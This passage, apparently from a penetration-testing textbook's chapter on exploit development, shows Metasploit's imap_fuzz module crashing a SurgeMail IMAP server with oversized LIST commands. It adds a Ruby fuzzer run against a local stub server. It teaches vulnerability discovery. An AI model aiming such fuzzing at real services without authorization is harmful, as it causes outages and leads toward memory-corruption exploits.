Chapter 14
The fuzzer should now be ready to go. Make sure that your debugger of choice (we’re using the Immunity Debugger in our examples) is attached to the surgemail.exe process, and start the fuzzer:
msf auxiliary(imap_fuzz) > run
[*] Authenticating as test with password test...
[*] Generating fuzzed data...
[*] Sending fuzzed data, buffer length = 684
[*] 0002 LIST () "/v1AD7DnJTVykXGYYM6BmnXuYRlZNIJUzQzFPvASjYxzdTTOngBJ5gfK0XjLy3ciAAk1Fmo0
RPEpq6f4BBnp5jm3LuSbAOj1M5qULEGEv0DMk0oOPUj6XPN1VwxFpjAfFeAxykiwdDiqNwnVJAKyr6X7C5ije7
DSujURybOp6BkKWroLCzQg2AmTuqz48oNeY9CDeirNwoITfIaC40Ds9OgEDtL8WN5tL4QYdVuZQ85219Thogk7
75GVfNH4YPpSo2PLmvd5Bf2sY9YDSvDqMmjW9FXrgLoUK2rl9cvoCbTZX1zuU1dDjnJJpXDuaysDfJKbtHn9Vh
siiYhFokALiF1QI9BRwj4bo0kwZDn8jyedxhSRdU9CFlMs19CvbVnnLWeRGHScrTxpduVJZygbJcrRp6AWQqke
Y0DzI4bd7uXgTIHXN6R403ALckZgqOWcUSEWj6THI9NFAIPP1LEnctaK0uxbzjpS1ize16r388StXBGq1we7Qa
8j6xqJsN5GmnIN4HQ4W4PZIjGRHUZC8Q4ytXYEksxXe2ZUhl5Xbdhz13zW2HpxJ2AT4kRU1wDqBUkEQwvKtoeb
rfUGJ8bvjTMSxKihrDMk6BxAnY6kjFGDi5o8hcEag4tzJ1FhH9eI2UHDVbsDmUHTfAFbreJTHVlcIruAozmZKz
i7XgTaOgzGh" "PWNED"
[*] 0002 OK LIST completed
. . . SNIP . . .
[*] Authenticating as test with password test...
[*] Generating fuzzed data...
[*] Sending fuzzed data, buffer length = 1007
[*] 0002 LIST () "/FzwJjIcL16vW4PXDPpJbpsHB4p7Xts9fbaJYjRJASXRqbZnOMzprZfVZH7BYvcHuwlN0Yq
yfoCrJyobzOqoscJeTeRgrDQKA8MDDLbmY6WCQ6XQH9Wkj4c9JCfPjIqTndsocWBz1xLMX1VdsutJEtnceHvhl
Gqee6Djh7v3oJW4tXJMMxe8uR2NgBlKoCbH18VTR8GUFqWCmQ0970B3gR9foi6inKdWdcE6ivbOHElAiYkFYzZ
06Q5dvza58DVhn8sqSnRAmq1UlcUGuvr6r99POlrZst10r606J2B03TBGDFuy0dNMI0EUANKZ6OnCn3Zk1JL65
9MC8PZy0frCiPBqZ4xn0biAjFTH5LsCjIFuI5eZ9LsdXdek7iiOhEmW6D86mAtyg9S1a7RALrbRcLIHJpwMsEE
5LS1wIV9aFPS6RQwI4DtF4bGSle1FCyf63hy3Vo8AKkId6yu5MfjwfUExandVeUldk8c5bhlyqoDp3UX2ClQPZ
os0KpFoIcxmq8R0E3Ri54l5Yl3OPcN7U20Kb1CEAfbhxGFgh1oMzjJpuM7IbHMrZNjVADz6A0byzgiP2pXa7Zm
OloV9u6Fwa0l6sR6oL0Png9MYNwTMXTUdiE7rOjuOmkdgglPTkZ3n4de1FEaLh8Xhf9SNSPZUX0M7gmUiyNYv6
qti3Omy8qvjJOQui1IhUhf5fKOunKIcB5Zw7quznxV1GF2R5hXVTw1vlbMi5TQW68ZDFlD6q6BJ4S3oNrFCyXX
aQpAURyCoDGdjoxk1vrUPGusf3i4EIF2iqyyekWiQ7GuYcwMax3o0ZXB2djFh2dYEGyBSCHaFhpwUgamThinnM
AsDFuEY9Hq9UOQSmZ6ySunifPFjCbDs4Zooquw0HPaVnbNVo97tfVBYSei9dWCUWwUAPVJVsTGoDNRVarOrg8q
wbziv8aQaPZ7Y8r0SUiB1nNhlhl3UCVZpf8Gck0psjETf4ks356q0I3mLZkqCLkznVV4ayetVgaDm" "PWNED"
[*] Server crashed, no response
[*] Auxiliary module execution completed
msf auxiliary(imap_fuzz) >
In this listing, the fuzzer connects and logs into the remote service, generates a random string of text, and sends the malicious request to the server; the server’s reply is received and displayed. If no reply comes back from the server, you receive the notification that the server has crashed, which is your cue to check your debugger.
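The loop the listing illustrates (log in, send a LIST command carrying a random filler of a given length, read the reply, and treat silence as a crash) can be reproduced end to end against a throwaway stub so you can see the crash-detection logic without a real mail server. The following Ruby is an added example written for this page, not the imap_fuzz module's own code: the stub server, its crash threshold of 900 bytes, the helper names (start_stub_server, random_string, read_line, fuzz_once, fuzz_lengths) and the port chosen by the OS are all constructed for the demonstration.

```ruby
require 'socket'

# Stub IMAP-like daemon, constructed for this example only. It answers LOGIN and LIST
# normally until the quoted LIST argument reaches +crash_at+ bytes, then drops the
# connection and stops listening without replying, imitating a daemon that has just
# crashed (the "[*] Server crashed, no response" case in the listing above).
def start_stub_server(crash_at)
  server = TCPServer.new('127.0.0.1', 0)   # port 0: let the OS pick a free port
  port = server.addr[1]
  Thread.new do
    alive = true
    while alive
      client = server.accept
      client.write("* OK stub IMAP ready\r\n")
      while (line = client.gets)
        tag, command, rest = line.chomp.split(' ', 3)
        case command
        when 'LOGIN'
          client.write("#{tag} OK LOGIN completed\r\n")
        when 'LIST'
          mailbox = rest.to_s[/"([^"]*)"\z/, 1].to_s  # the quoted "/..." argument
          if mailbox.length >= crash_at
            alive = false                             # simulate the crash: no reply at all
            break
          end
          client.write("#{tag} OK LIST completed\r\n")
        else
          client.write("#{tag} BAD unknown command\r\n")
        end
      end
      client.close
    end
    server.close   # a dead process no longer accepts connections either
  end
  port
end

# Random alphanumeric filler of the requested length, like the LIST argument in the listing.
def random_string(len)
  chars = [*'a'..'z', *'A'..'Z', *'0'..'9']
  Array.new(len) { chars.sample }.join
end

# Read one line from +sock+, or return nil if nothing arrives within +timeout+ seconds
# or the peer closes the connection: both look like "no response" to the fuzzer.
def read_line(sock, timeout)
  return nil unless IO.select([sock], nil, nil, timeout)
  sock.gets
end

# One fuzz iteration: log in, send LIST with a +len+-byte mailbox name, and return the
# server's reply line, or nil when the server gives none (the crash indicator).
def fuzz_once(host, port, len, timeout: 2)
  sock = TCPSocket.new(host, port)
  read_line(sock, timeout)                              # greeting banner
  sock.write("0001 LOGIN test test\r\n")
  read_line(sock, timeout)                              # "0001 OK LOGIN completed"
  sock.write("0002 LIST () \"/#{random_string(len)}\"\r\n")
  read_line(sock, timeout)
rescue Errno::ECONNREFUSED, Errno::ECONNRESET, Errno::EPIPE
  nil                                                   # daemon gone: treat as no response
ensure
  sock&.close
end

# Step through increasing buffer lengths and stop at the first one that draws no reply.
# Returns the crashing length (nil if none) and a log of [length, reply] pairs.
def fuzz_lengths(host, port, lengths)
  log = []
  lengths.each do |len|
    puts "[*] Sending fuzzed data, buffer length = #{len}"
    reply = fuzz_once(host, port, len)
    log << [len, reply]
    if reply.nil?
      puts '[*] Server crashed, no response'
      return { crashed_at: len, log: log }
    end
    puts "[*] #{reply.strip}"
  end
  { crashed_at: nil, log: log }
end

if __FILE__ == $PROGRAM_NAME
  port = start_stub_server(900)                         # stub falls over at 900 bytes
  result = fuzz_lengths('127.0.0.1', port, (100..2000).step(100).to_a)
  puts "[*] Smallest crashing length: #{result[:crashed_at].inspect}"
end
```

The point to take from the stub is how thin the crash signal is: the fuzzer cannot tell a timeout from a closed socket from a refused connection, so all three collapse into "no response", and the debugger attached to the real process is what tells you whether that silence was an actual fault and where it happened. Recording the [length, reply] log also gives you the smallest length that produced the silence, which is the number you carry into the next step of narrowing the buffer size.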
If you now check your debugger on the Windows target, you should see
that it has paused at the point of the crash, as shown in Figure 14-1. Looking
at the crash, we can see that no memory addresses are overwritten and that,
unfortunately, there’s nothing really exploitable at first glance. After further
tinkering with increasing buffer lengths, you will find that by sending an